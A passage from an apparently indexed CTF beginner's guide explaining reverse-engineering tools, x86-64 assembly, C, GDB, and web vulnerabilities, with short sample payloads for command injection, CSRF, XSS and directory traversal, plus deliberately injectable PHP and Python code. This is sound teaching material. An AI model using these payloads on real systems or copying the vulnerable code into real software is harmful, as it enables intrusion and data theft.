"}, {"location": "reverse-engineering/what-are-disassemblers/#list-of-disassemblers", "title": "List of Disassemblers", "text": "The Interactive Disassembler (IDA) is the industry standard for binary disassembly. IDA is capable of disassembling \"virtually any popular file format\". This makes it very useful to security researchers and CTF players who often need to analyze obscure files without knowing what they are or where they came from. IDA also features the industry leading Hex Rays decompiler which can convert assembly code back into a pseudo code like format.
IDA also has a plugin interface which has been used to create some successful plugins that can make reverse engineering easier:
Binary Ninja is an up and coming disassembler that attempts to bring a new, more programmatic approach to reverse engineering. Binary Ninja brings an improved plugin API and modern features to reverse engineering. While it's less popular or as old as IDA, Binary Ninja (often called binja) is quickly gaining ground and has a small community of dedicated users and followers.
Binja also has some community contributed plugins which are collected here: https://github.com/Vector35/community-plugins
"}, {"location": "reverse-engineering/what-are-disassemblers/#gdb", "title": "gdb", "text": "The GNU Debugger is a free and open source debugger which also disassembles programs. It's capable as a disassembler, but most notably it is used by CTF players for its debugging and dynamic analysis capabailities.
gdb is often used in tandom with enhancement scripts like peda, pwndbg, and GEF
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/", "title": "Assembly/Machine Code", "text": "Machine Code or Assembly is code which has been formatted for direct execution by a CPU. Machine Code is the reason why readable programming languages like C, when compiled, cannot be reversed into source code (well Decompilers can sort of, but more on that later).
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#from-source-to-compilation", "title": "From Source to Compilation", "text": "Godbolt shows the differences in machine code generated by various compilers.
For example, if we have a simple C++ function:
#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nint main() {\n char c;\n int fd = syscall(2, \"/etc/passwd\", 0);\n while (syscall(0, fd, &c, 1)) {\n putchar(c);\n }\n}\n
We can see the compilation results in some verbose instructions for the CPU:
.LC0:\n .string \"/etc/passwd\"\nmain:\n push rbp\n mov rbp, rsp\n sub rsp, 16\n mov edx, 0\n mov esi, OFFSET FLAT:.LC0\n mov edi, 2\n mov eax, 0\n call syscall\n mov DWORD PTR [rbp-4], eax\n.L3:\n lea rdx, [rbp-5]\n mov eax, DWORD PTR [rbp-4]\n mov ecx, 1\n mov esi, eax\n mov edi, 0\n mov eax, 0\n call syscall\n test rax, rax\n setne al\n test al, al\n je .L2\n movzx eax, BYTE PTR [rbp-5]\n movsx eax, al\n mov edi, eax\n call putchar\n jmp .L3\n.L2:\n mov eax, 0\n leave\n ret\n
This is a one way process for compiled languages as there is no way to generate source from machine code. While the machine code may seem unintelligible, the extremely basic functions can be interpreted with some practice.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64", "title": "x86-64", "text": "x86-64 or amd64 or i64 is a 64-bit Complex Instruction Set Computing (CISC) architecture. This basically means that the registers used for this architecture extend an extra 32-bits on Intel's x86 architecture. CISC means that a single instruction can do a bunch of different things at once, such as memory accesses, register reads, etc. It is also a variable-length instruction set, which means different instructions can be different sizes ranging from 1 to 16 bytes long. And finally x86-64 allows for multi-sized register access, which means that you can access certain parts of a register which are different sizes.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#x86-64-registers", "title": "x86-64 Registers", "text": "x86-64 registers behave similarly to other architectures. A key component of x86-64 registers is multi-sized access which means the register RAX can have its lower 32 bits accessed with EAX. The next lower 16 bits can be accessed with AX and the lowest 8 bits can be accessed with AL which allows for the compiler to make optimizations which boost program execution.
x86-64 has plenty of registers to use, including rax, rbx, rcx, rdx, rdi, rsi, rsp, rip, r8-r15, and more! But some registers serve special purposes.
The special registers include: - RIP: the instruction pointer - RSP: the stack pointer - RBP: the base pointer
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#instructions", "title": "Instructions", "text": "An instruction represents a single operation for the CPU to perform.
There are different types of instructions including:
mov rax, [rsp - 0x40]
add rbx, rcx
jne 0x8000400
Because x86-64 is a CISC architecture, instructions can be quite complex for machine code, such as repne scasb
which repeats up to ECX times over memory at EDI looking for a NULL byte (0x00), decrementing ECX each byte (essentially strlen() in a single instruction!).
It is important to remember that an instruction really is just memory; this idea will become useful with Return Oriented Programming or ROP.
Note
Instructions, numbers, strings, everything are always represented in hex!
add rax, rbx\nmov rax, 0xdeadbeef\nmov rax, [0xdeadbeef] == 67 48 8b 05 ef be ad de\n\"Hello\" == 48 65 6c 6c 6f\n== 48 01 d8\n== 48 c7 c0 ef be ad de\n
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#execution", "title": "Execution", "text": "What should the CPU execute? This is determined by the RIP register where IP means instruction pointer. Execution follows the pattern: fetch the instruction at the address in RIP, decode it, run it.
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#examples", "title": "Examples", "text": "mov rax, 0xdeadbeef
Here the operation mov
is moving the \"immediate\" 0xdeadbeef
into the register RAX
mov rax, [0xdeadbeef + rbx * 4]
Here the operation mov
is moving the data at the address of [0xdeadbeef + RBX*4]
into the register RAX
. When brackets are used, you can think of the program as getting the content from that effective address.
-> 0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804000\n 0x080400a: add, rax, rbx RAX = 0x0\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n-> 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add, rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x0\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400a\n-> 0x080400a: add, rax, rbx RAX = 0xdeadbeef\n 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x080400d\n 0x080400a: add, rax, rbx RAX = 0xdeadd123\n-> 0x080400d: inc rbx RBX = 0x1234\n 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804010\n 0x080400a: add, rax, rbx RAX = 0xdeadd123\n 0x080400d: inc rbx RBX = 0x1235\n-> 0x0804010: sub rax, rbx RCX = 0x0\n 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804013\n 0x080400a: add, rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0x0\n-> 0x0804013: mov rcx, rax RDX = 0x0\n
0x0804000: mov eax, 0xdeadbeef Register Values:\n 0x0804005: mov ebx, 0x1234 RIP = 0x0804005\n 0x080400a: add, rax, rbx RAX = 0xdeadbeee\n 0x080400d: inc rbx RBX = 0x1235\n 0x0804010: sub rax, rbx RCX = 0xdeadbeee\n 0x0804013: mov rcx, rax RDX = 0x0\n
"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#control-flow", "title": "Control Flow", "text": "How can we express conditionals in x86-64? We use conditional jumps such as:
jnz <address>
je <address>
jge <address>
jle <address>
They jump if their condition is true, and just go to the next instruction otherwise. These conditionals are checking EFLAGS, which are special registers which store flags on certain instructions such as add rax, rbx
which sets the o (overflow) flag if the sum is greater than a 64-bit register can hold, and wraps around. You can jump based on that with a jo
instruction. The most important thing to remember is the cmp instruction:
cmp rax, rbx\njle error\n
This assembly jumps if RAX <= RBX"}, {"location": "reverse-engineering/what-is-assembly-machine-code/#addresses", "title": "Addresses", "text": "Memory acts similarly to a big array where the indices of this \"array\" are memory addresses. Remember from earlier:
mov rax, [0xdeadbeef]
The square brackets mean \"get the data at this address\". This is analogous to the C/C++ syntax: rax = *0xdeadbeef;
The C programming language was written by Dennis Ritchie in the 1970s while he was working at Bell Labs. It was first used to reimplement the Unix operating system which was purely written in assembly language. At first, the Unix developers were considering using a language called \"B\" but because B wasn't optimized for the target computer, the C language was created.
Note
C is the letter and the programming language after B!
C was designed to be close to assembly and is still widely used in lower level programming where speed and control are needed (operating systems, embedded systems). C was also very influential to other programming languages used today. Notable languages include C++, Objective-C, Golang, Java, JavaScript, PHP, Python, and Rust.
"}, {"location": "reverse-engineering/what-is-c/#hello-world", "title": "Hello World", "text": "C is an ancestor of many other programming languages and if you are familiar with programming, it's likely that C will be at least somewhat familiar.
#include <stdio.h>\nint main()\n{\n printf(\"Hello, World!\");\n return 0;\n}\n
"}, {"location": "reverse-engineering/what-is-c/#today", "title": "Today", "text": "Today C is widely used either as a low level programming language or is the base language that other programming languages are implemented in.
While it can be difficult to see, the C language compiles down directly into machine code. The compiler is programmed to process the provided C code and emit assembly that's targetted to whatever operating system and architecture the compiler is set to use.
Some common compilers include:
A good way to explore this relationship is to use this online GCC Explorer from Matt Godbolt.
In regards to CTF, many reverse engineering and exploitation CTF challenges are written in C because the language compiles down directly to assembly and there are little to no safeguards in the language. This means developers must manually handle both. Of course, this can lead to mistakes which can sometimes lead to security issues.
Note
Other higher level langauges like Python manage memory and garbage collection for you. Google Golang was inspired by C, but adds in functionality like garbage collection and memory safety.
There are some examples of famously vulnerable functions in C which are still available and can still result in vulnerabilities:
gets
- Can result in buffer overflowsstrcpy
- Can result in buffer overflowsstrcat
- Can result in buffer overflowsstrcmp
- Can result in timing attacksC has four basic types:
C uses an idea known as pointers. A pointer is a variable which contains the address of another variable.
To understand this idea we should first understand that memory is laid out in terms of addresses and data gets stored at these addresses.
Take the following example of defining an integer in C:
int x = 4;\n
To the programmer this is the variable x
receiving the value of 4. The computer stores this value in some location in memory. For example we can say that address 0x1000
now holds the value 4
. The computer knows to directly access the memory and retrieve the value 4
whenever the programmer tries to use the x
variable. If we were to say x + 4
, the computer would give you 8
instead of 0x1004
.
But in C we can retrieve the memory address being used to hold the 4 value (i.e. 0x1000) by using the &
character and using *
to create an \"integer pointer\" type.
int* y = &x;\n
The y
variable will store the address pointed to by the x
variable (0x1000).
Note
The *
character allows us to declare pointer variables but also allows us to access the value stored at a pointer. For example, entering *y
allows us to access the 4 value instead of 0x1000.
Whenever we use the y
variable we are using the memory address, but if we use the x
variable we use the value stored at the memory address.
Arrays are a grouping of objects of the same type. They are typically created with the following syntax:
type arrayName [ arraySize ];\n
To initialize values in the array we can do:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n
Arrays allow programmers to group data into logical containers.
To access the individual elements of an array we access the contents by their \"index\". Most programming langauges today start counting from 0. So to take our previous example:
int integers[ 10 ] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10};\n/* indexes 0 1 2 3 4 5 6 7 8 9\n
To access the value 6 we would use index 5:
integers[5];\n
"}, {"location": "reverse-engineering/what-is-c/#how-do-arrays-work", "title": "How do arrays work?", "text": "Arrays are a clever combination of multiplication, pointers, and programming.
Because the computer knows the data type used for every element in the array, the computer needs to simply multiply the size of the data type by the index you are looking for and then add this value to the address of the beginning of the array.
For example if we know that the base address of an array is 1000 and we know that each integer takes 8 bytes, we know that if we have 8 integers right next to each other, we can get the integer at the 4th index with the following math:
1000 + (4 * 8) = 1032\n
array [ 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 ]\nindex 0 1 2 3 4 5 6 7\naddrs 1000 1008 1016 1024 1032 1040 1048 1056\n
"}, {"location": "reverse-engineering/what-is-c/#memory-management", "title": "Memory Management", "text": ""}, {"location": "reverse-engineering/what-is-gdb/", "title": "The GNU Debugger (GDB)", "text": "The GNU Debugger or GDB is a powerful debugger which allows for step-by-step execution of a program. It can be used to trace program execution and is an important part of any reverse engineering toolkit.
"}, {"location": "reverse-engineering/what-is-gdb/#vanilla-gdb", "title": "Vanilla GDB", "text": "GDB without any modifications is unintuitive and obscures a lot of useful information. The plug-in pwndb solves a lot of these problems and makes for a much more pleasant experience. But if you are constrained and have to use vanilla gdb, here are several things to make your life easier.
"}, {"location": "reverse-engineering/what-is-gdb/#starting-gdb", "title": "Starting GDB", "text": "To execute GBD and attach it to a program simply run gdb [program]
(gdb) disassemble [address/symbol]
will display the disassembly for that function/frame
GDB will autocomplete functions, so saying (gdb) disas main
suffices if you'd like to see the disassembly of main
Another handy thing to see while stepping through a program is the disassembly of nearby instructions:
(gdb) display/[# of instructions]i $pc [\u00b1 offset]
display
shows data with each step/[#]i
shows how much data in the format i for instruction $pc
means the pc, program counter, register[\u00b1 offset]
allows you to specify how you would like the data offset from the current instruction(gdb) display/10i $pc - 0x5
This command will show 10 instructions on screen with an offset from the next instruction of 5, giving us this display:
0x8048535 <main+6>: lock pushl -0x4(%ecx)\n 0x8048539 <main+10>: push %ebp\n=> 0x804853a <main+11>: mov %esp,%ebp\n 0x804853c <main+13>: push %ecx\n 0x804853d <main+14>: sub $0x14,%esp\n 0x8048540 <main+17>: sub $0xc,%esp\n 0x8048543 <main+20>: push $0x400\n 0x8048548 <main+25>: call 0x80483a0 <malloc@plt>\n 0x804854d <main+30>: add $0x10,%esp\n 0x8048550 <main+33>: sub $0xc,%esp\n
"}, {"location": "reverse-engineering/what-is-gdb/#deleting-views", "title": "Deleting Views", "text": "If for whatever reason, a view no long suits your needs simply call (gdb) info display
which will give you a list of active displays:
Auto-display expressions now in effect:\nNum Enb Expression\n1: y /10bi $pc-0x5\n
Then simply execute (gdb) delete display 1
and your execution will resume without the display.
In order to view the state of registers with vanilla gdb, you need to run the command info registers
which will display the state of all the registers:
eax 0xf77a6ddc -142971428\necx 0xffe06b10 -2069744\nedx 0xffe06b34 -2069708\nebx 0x0 0\nesp 0xffe06af8 0xffe06af8\nebp 0x0 0x0\nesi 0xf77a5000 -142979072\nedi 0xf77a5000 -142979072\neip 0x804853a 0x804853a <main+11>\neflags 0x286 [ PF SF IF ]\ncs 0x23 35\nss 0x2b 43\nds 0x2b 43\nes 0x2b 43\nfs 0x0 0\ngs 0x63 99\n
If you simply would like to see the contents of a single register, the notation x/x $[register]
where:
x/x
means display the address in hex notation$[register]
is the register code such as eax, rax, etc.These commands work with vanilla gdb as well.
"}, {"location": "reverse-engineering/what-is-gdb/#setting-breakpoints", "title": "Setting Breakpoints", "text": "Setting breakpoints in GDB uses the format b*[Address/Symbol]
(gdb) b*main
: Break at the start(gdb) b*0x804854d
: Break at 0x804854d(gdb) b*0x804854d-0x100
: Break at 0x804844dAs before, in order to delete a view, you can list the available breakpoints using (gdb) info breakpoints
(don't forget about GDB's autocomplete, you don't always need to type out every command!) which will display all breakpoints:
Num Type Disp Enb Address What\n1 breakpoint keep y 0x0804852f <main>\n3 breakpoint keep y 0x0804864d <__libc_csu_init+61>\n
Then simply execute (gdb) delete 1
Note
GDB creates breakpoints chronologically and does NOT reuse numbers.
"}, {"location": "reverse-engineering/what-is-gdb/#stepping", "title": "Stepping", "text": "What good is a debugger if you can't control where you are going? In order to begin execution of a program, use the command r [arguments]
similar to how if you ran it with dot-slash notation you would execute it ./program [arguments]
. In this case the program will run normally and if no breakpoints are set, you will execute normally. If you have breakpoints set, you will stop at that instruction.
(gdb) continue [# of breakpoints]
: Resumes the execution of the program until it finishes or until another breakpoint is hit (shorthand c
)(gdb) step[# of instructions]
: Steps into an instruction the specified number of times, default is 1 (shorthand s
)(gdb) next instruction [# of instructions]
: Steps over an instruction meaning it will not delve into called functions (shorthand ni
)(gdb) finish
: Finishes a function and breaks after it gets returned (shorthand fin
)Examining data in GDB is also very useful for seeing how the program is affecting data. The notation may seem complex at first, but it is flexible and provides powerful functionality.
(gdb) x/[#][size][format] [Address/Symbol/Register][\u00b1 offset]
x/
means examine[#]
means how much[size]
means what size the data should be such as a word w (2 bytes), double word d (4 bytes), or giant word g (8 bytes)[format]
means how the data should be interpreted such as an instruction i, a string s, hex bytes x[Address/Symbol][\u00b1 offset]
means where to start interpreting the data(gdb) x/x $rax
: Displays the content of the register RAX as hex bytes(gdb) x/i 0xdeadbeef
: Displays the instruction at address 0xdeadbeef(gdb) x/10s 0x893e10
: Displays 10 strings at the address(gdb) x/10gx 0x7fe10
: Displays 10 giant words as hex at the addressIf the program happens to be an accept-and-fork server, gdb will have issues following the child or parent processes. In order to specify how you want gdb to function you can use the command set follow-fork-mode [on/off]
If you would like to set data at any point, it is possible using the command set [Address/Register]=[Hex Data]
set $rax=0x0
: Sets the register rax to 0set 0x1e4a70=0x123
: Sets the data at 0x1e4a70 to 0x123A handy way to find the process's mapped address spaces is to use info proc map
:
Mapped address spaces:\n\n Start Addr End Addr Size Offset objfile\n 0x8048000 0x8049000 0x1000 0x0 /directory/program\n 0x8049000 0x804a000 0x1000 0x0 /directory/program\n 0x804a000 0x804b000 0x1000 0x1000 /directory/program\n 0xf75cb000 0xf75cc000 0x1000 0x0\n 0xf75cc000 0xf7779000 0x1ad000 0x0 /lib32/libc-2.23.so\n 0xf7779000 0xf777b000 0x2000 0x1ac000 /lib32/libc-2.23.so\n 0xf777b000 0xf777c000 0x1000 0x1ae000 /lib32/libc-2.23.so\n 0xf777c000 0xf7780000 0x4000 0x0\n 0xf778b000 0xf778d000 0x2000 0x0 [vvar]\n 0xf778d000 0xf778f000 0x2000 0x0 [vdso]\n 0xf778f000 0xf77b1000 0x22000 0x0 /lib32/ld-2.23.so\n 0xf77b1000 0xf77b2000 0x1000 0x0\n 0xf77b2000 0xf77b3000 0x1000 0x22000 /lib32/ld-2.23.so\n 0xf77b3000 0xf77b4000 0x1000 0x23000 /lib32/ld-2.23.so\n 0xffc59000 0xffc7a000 0x21000 0x0 [stack]\n
This will show you where the stack, heap (if there is one), and libc are located.
"}, {"location": "reverse-engineering/what-is-gdb/#attaching-processes", "title": "Attaching Processes", "text": "Another useful feature of GDB is to attach to processes which are already running. Simply launch gdb using gdb
, then find the process id of the program you would like to attach to an execute attach [pid]
.
Websites all around the world are programmed using various programming languages. While there are specific vulnerabilities in each programming langage that the developer should be aware of, there are issues fundamental to the internet that can show up regardless of the chosen language or framework.
These vulnerabilities often show up in CTFs as web security challenges where the user needs to exploit a bug to gain some kind of higher level privelege.
Common vulnerabilities to see in CTF challenges:
Command Injection is a vulnerability that allows an attacker to submit system commands to a computer running a website. This happens when the application fails to encode user input that goes into a system shell. It is very common to see this vulnerability when a developer uses the system()
command or its equivalent in the programming language of the application.
import os\n\ndomain = user_input() # ctf101.org\n\nos.system('ping ' + domain)\n
The above code when used normally will ping the ctf101.org
domain.
But consider what would happen if the user_input()
function returned different data?
import os\n\ndomain = user_input() # ; ls\n\nos.system('ping ' + domain)\n
Because of the additional semicolon, the os.system()
function is instructed to run two commands.
It looks to the program as:
ping ; ls\n
Note
The semicolon terminates a command in bash and allows you to put another command after it.
Because the ping
command is being terminated and the ls
command is being added on, the ls
command will be run in addition to the empty ping command!
This is the core concept behind command injection. The ls
command could of course be switched with another command (e.g. wget, curl, bash, etc.)
Command injection is a very common means of privelege escalation within web applications and applications that interface with system commands. Many kinds of home routers take user input and directly append it to a system command. For this reason, many of those home router models are vulnerable to command injection.
"}, {"location": "web-exploitation/command-injection/what-is-command-injection/#example-payloads", "title": "Example Payloads", "text": ";ls
$(ls)
`ls`
A Cross Site Request Forgery or CSRF Attack, pronounced see surf, is an attack on an authenticated user which uses a state session in order to perform state changing attacks like a purchase, a transfer of funds, or a change of email address.
The entire premise of CSRF is based on session hijacking, usually by injecting malicious elements within a webpage through an <img>
tag or an <iframe>
where references to external resources are unverified.
GET
requests are often used by websites to get user input. Say a user signs in to an banking site which assigns their browser a cookie which keeps them logged in. If they transfer some money, the URL that is sent to the server might have the pattern:
http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]
Knowing this format, an attacker can send an email with a hyperlink to be clicked on or they can include an image tag of 0 by 0 pixels which will automatically be requested by the browser such as:
<img src=\"http://securibank.com/transfer.do?acct=[RECEPIENT]&amount=[DOLLARS]\" width=\"0\" height=\"0\" border=\"0\">
Cross Site Scripting or XSS is a vulnerability where on user of an application can send JavaScript that is executed by the browser of another user of the same application.
This is a vulnerability because JavaScript has a high degree of control over a user's web browser.
For example JavaScript has the ability to:
By combining all of these abilities, XSS can maliciously use JavaScript to extract user's cookies and send them to an attacker controlled server. XSS can also modify the DOM to phish users for their passwords. This only scratches the surface of what XSS can be used to do.
XSS is typically broken down into three categories:
Reflected XSS is when an XSS exploit is provided through a URL paramater.
For example:
https://ctf101.org?data=<script>alert(1)</script>\n
You can see the XSS exploit provided in the data
GET parameter. If the application is vulnerable to reflected XSS, the application will take this data parameter value and inject it into the DOM.
For example:
<html>\n <body>\n <script>alert(1)</script>\n </body>\n</html>\n
Depending on where the exploit gets injected, it may need to be constructed differently.
Also, the exploit payload can change to fit whatever the attacker needs it to do. Whether that is to extract cookies and submit it to an external server, or to simply modify the page to deface it.
One of the deficiencies of reflected XSS however is that it requires the victim to access the vulnerable page from an attacker controlled resource. Notice that if the data paramter, wasn't provided the exploit wouldn't work.
In many situations, reflected XSS is detected by the browser because it is very simple for a browser to detect malicous XSS payloads in URLs.
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#stored-xss", "title": "Stored XSS", "text": "Stored XSS is different from reflected XSS in one key way. In reflected XSS, the exploit is provided through a GET parameter. But in stored XSS, the exploit is provided from the website itself.
Imagine a website that allows users to post comments. If a user can submit an XSS payload as a comment, and then have others view that malicious comment, it would be an example of stored XSS.
The reason being that the web site itself is serving up the XSS payload to other users. This makes it very difficult to detect from the browser's perspective and no browser is capable of generically preventing stored XSS from exploiting a user.
"}, {"location": "web-exploitation/cross-site-scripting/what-is-cross-site-scripting/#dom-xss", "title": "DOM XSS", "text": "DOM XSS is XSS that is due to the browser itself injecting an XSS payload into the DOM. While the server itself may properly prevent XSS, it's possible that the client side scripts may accidentally take a payload and insert it into the DOM and cause the payload to trigger.
The server itself is not to blame, but the client side JavaScript files are causing the issue.
"}, {"location": "web-exploitation/directory-traversal/what-is-directory-traversal/", "title": "Directory Traversal", "text": "Directory Traversal is a vulnerability where an application takes in user input and uses it in a directory path.
Any kind of path controlled by user input that isn't properly sanitized or properly sandboxed could be vulnerable to directory traversal.
For example, consider an application that allows the user to choose what page to load from a GET parameter.
<?php\n $page = $_GET['page']; // index.php\n include(\"/var/www/html/\" . $page);\n?>\n
Under normal operation the page would be index.php
. But what if a malicious user gave in something different?
<?php\n $page = $_GET['page']; // ../../../../../../../../etc/passwd\n include(\"/var/www/html/\" . $page);\n?>\n
Here the user is submitting ../../../../../../../../etc/passwd
.
This will result in the PHP interpreter leaving the directory that it is coded to look in ('/var/www/html') and instead be forced up to the root folder.
include(\"/var/www/html/../../../../../../../../etc/passwd\");\n
Ultimately this will become /etc/passwd
because the computer will not go a directory above its top directory.
Thus the application will load the /etc/passwd
file and emit it to the user like so:
root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false\nsystemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false\nsystemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false\nsystemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false\n_apt:x:104:65534::/nonexistent:/bin/false\n
This same concept can be applied to applications where some input is taken from a user and then used to access a file or path or similar. This vulnerability very often can be used to leak sensitive data or extract application source code to find other vulnerabilities.
"}, {"location": "web-exploitation/php/what-is-php/", "title": "PHP", "text": "PHP is one of the most used languages for back-end web development and therefore it has become a target by hackers. PHP is a language which makes it painful to be secure for most instances, making it every hacker's dream target.
"}, {"location": "web-exploitation/php/what-is-php/#overview", "title": "Overview", "text": "PHP is a C-like language which uses tags enclosed by <?php ... ?>
(sometimes just <? ... ?>
). It is inlined into HTML. A word of advice is to keep the php docs open because function names are strange due to the fact that the length of function name is used to be the key in PHP's internal dictionary, so function names were shortened/lengthened to make the lookup faster. Other things include:
$name
$$name
$_GET, $_POST, $_SERVER
<?php\n if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['email']) && isset($_POST['password'])) {\n $db = new mysqli('127.0.0.1', 'cs3284', 'cs3284', 'logmein');\n $email = $_POST['email'];\n $password = sha1($_POST['password']);\n $res = $db->query(\"SELECT * FROM users WHERE email = '$email' AND password = '$password'\");\n if ($row = $res->fetch_assoc()) {\n $_SESSION['id'] = $row['id'];\n header('Location: index.php');\n die();\n }\n }\n?>\n<html>...\n
This example PHP simply checks the POST data for an email and password. If the password is equal to the hashed password in the database, the use is logged in and redirected to the index page.
The line email = '$email'
uses automatic string interpolation in order to convert $email into a string to compare with the database.
PHP will do just about anything to match with a loose comparison (\\=\\=) which means things can be 'equal' (\\=\\=) or really equal (\\=\\=\\=). The implicit integer parsing to strings is the root cause of a lot of issues in PHP.
"}, {"location": "web-exploitation/php/what-is-php/#type-comparison-table", "title": "Type Comparison Table", "text": ""}, {"location": "web-exploitation/php/what-is-php/#comparisons-of-x-with-php-functions", "title": "Comparisons of $x with PHP Functions", "text": "Expression gettype() empty() is_null() isset() boolean:if($x)
$x = \"\"; string TRUE FALSE TRUE FALSE $x = null; NULL TRUE TRUE FALSE FALSE var $x; NULL TRUE TRUE FALSE FALSE $x is undefined NULL TRUE TRUE FALSE FALSE $x = array(); array TRUE FALSE TRUE FALSE $x = array('a', 'b'); array FALSE FALSE TRUE TRUE $x = false; boolean TRUE FALSE TRUE FALSE $x = true; boolean FALSE FALSE TRUE TRUE $x = 1; integer FALSE FALSE TRUE TRUE $x = 42; integer FALSE FALSE TRUE TRUE $x = 0; integer TRUE FALSE TRUE FALSE $x = -1; integer FALSE FALSE TRUE TRUE $x = \"1\"; string FALSE FALSE TRUE TRUE $x = \"0\"; string TRUE FALSE TRUE FALSE $x = \"-1\"; string FALSE FALSE TRUE TRUE $x = \"php\"; string FALSE FALSE TRUE TRUE $x = \"true\"; string FALSE FALSE TRUE TRUE $x = \"false\"; string FALSE FALSE TRUE TRUE"}, {"location": "web-exploitation/php/what-is-php/#comparisons", "title": "\"==\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== ==TRUE== FALSE ==TRUE== 1 ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE ==TRUE== FALSE ==TRUE== ==TRUE== -1 ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE \"1\" ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE \"-1\" ==TRUE== FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE NULL FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE ==TRUE== array() FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== ==TRUE== FALSE FALSE \"php\" ==TRUE== FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE \"\" FALSE ==TRUE== FALSE ==TRUE== FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE ==TRUE=="}, {"location": "web-exploitation/php/what-is-php/#comparisons_1", "title": "\"===\" Comparisons", "text": "TRUE FALSE 1 0 -1 \"1\" \"0\" \"-1\" NULL array() \"php\" \"\" TRUE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 1 FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE FALSE -1 FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE FALSE \"1\" FALSE FALSE FALSE FALSE FALSE ==TRUE== FALSE FALSE FALSE FALSE FALSE FALSE \"0\" FALSE FALSE FALSE FALSE FALSE 